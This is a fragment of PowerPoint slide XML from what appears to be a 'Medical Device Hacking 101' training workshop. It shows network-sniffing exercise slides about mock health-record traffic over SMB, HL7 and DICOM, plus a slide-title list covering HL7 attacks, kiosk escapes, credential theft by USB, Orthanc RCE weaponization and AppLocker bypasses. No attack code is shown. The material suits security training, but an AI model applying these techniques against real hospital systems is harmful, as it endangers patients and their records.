          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take a look around the the network, see if you can see anything chatting between the two systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can you see what is going on?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does anything look vulnerable?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can you improve your odds of seeing traffic flows?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39621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9173-EA29-E690-F8F7-596589FA8875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise: What is going on?  (5 minutes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E375AD2C-A03C-A063-6EA4-98CC91088F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What IS actually going on is a few things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A host is sending SMB data (mock health records) to a SAMBA share on the LAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternately, the same host is posting HL7 health records to a listening HL7 server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I am uploading DICOM files on a DICOM server attached to another host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hl7 is accepting messages at a host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392120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b1c42c6-cdbd-4148-9a00-dfb450589dc5}" enabled="1" method="Privileged" siteId="{dc8750aa-6ec6-40bd-8d81-301de01ec845}" contentBits="0" removed="0"/>
</clbl:labelList>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <TotalTime>1146</TotalTime>
  <Words>3863</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>337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Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>GOLDEN RULE</vt:lpstr>
      <vt:lpstr>Medical Device Hacking 101 - Primer</vt:lpstr>
      <vt:lpstr>External To the Device (Net) – the Beginning</vt:lpstr>
      <vt:lpstr>Example: Network Sniffing with LanTap</vt:lpstr>
      <vt:lpstr>Example: Network Sniffing with LanTap</vt:lpstr>
      <vt:lpstr>Example: Network Sniffing with LanTap (Router)</vt:lpstr>
      <vt:lpstr>Exercise: What is going on?  (5 minutes)</vt:lpstr>
      <vt:lpstr>Exercise: What is going on?  (5 minutes)</vt:lpstr>
      <vt:lpstr>VULNERABILITIES</vt:lpstr>
      <vt:lpstr>VULNERABILITIES</vt:lpstr>
      <vt:lpstr>HL7 Vulnerabilities CONTD</vt:lpstr>
      <vt:lpstr>I want you to hit me…</vt:lpstr>
      <vt:lpstr>EXERCISE: HL7 ATTACK!!!!</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (System Testing)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Escape Tools)</vt:lpstr>
      <vt:lpstr>Moving Inward – The Kiosk (Windows Accessibility Options)</vt:lpstr>
      <vt:lpstr>EXERCISE – KIOSK PLAY TIME (Windows VM)</vt:lpstr>
      <vt:lpstr>Attacking USB Ports</vt:lpstr>
      <vt:lpstr>DEMONSTRATION - BashBunny QuickCreds</vt:lpstr>
      <vt:lpstr>Repurposing Exploits – DICOM Attack – CVE-2023-33466 – DICOM PolyGlot Files</vt:lpstr>
      <vt:lpstr>And ta da!</vt:lpstr>
      <vt:lpstr>Issues</vt:lpstr>
      <vt:lpstr>Orthanc Linux RCE to Windows RCE</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Orthanc Windows RCE - Weaponization</vt:lpstr>
      <vt:lpstr>Applocker Bypasses</vt:lpstr>
      <vt:lpstr>EXERCISE – Check MY Access</vt:lpstr>
      <vt:lpstr>Applocker Bypasses – DLL’s</vt:lpstr>
      <vt:lpstr>Applocker Bypasses – DLL’s</vt:lpstr>
      <vt:lpstr>Applocker Bypasses – DLL’s</vt:lpstr>
      <vt:lpstr>Alternate Data Streams (still works)</vt:lpstr>
      <vt:lpstr>Alternate Data Streams (still works)</vt:lpstr>
      <vt:lpstr>Alternate Data Streams (still works)</vt:lpstr>
      <vt:lpstr>Alternate Data Streams (still works)</vt:lpstr>
      <vt:lpstr>Third Party Execution (MalDocs Anyone?)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Aguilar</dc:creator>
  <cp:lastModifiedBy>Michael Aguilar</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T18:19:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-12T02:00:22Z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 //Secureworks/Confidential - Limited External Distribution</vt:lpwstr>
  </property>
</Properties>
</file>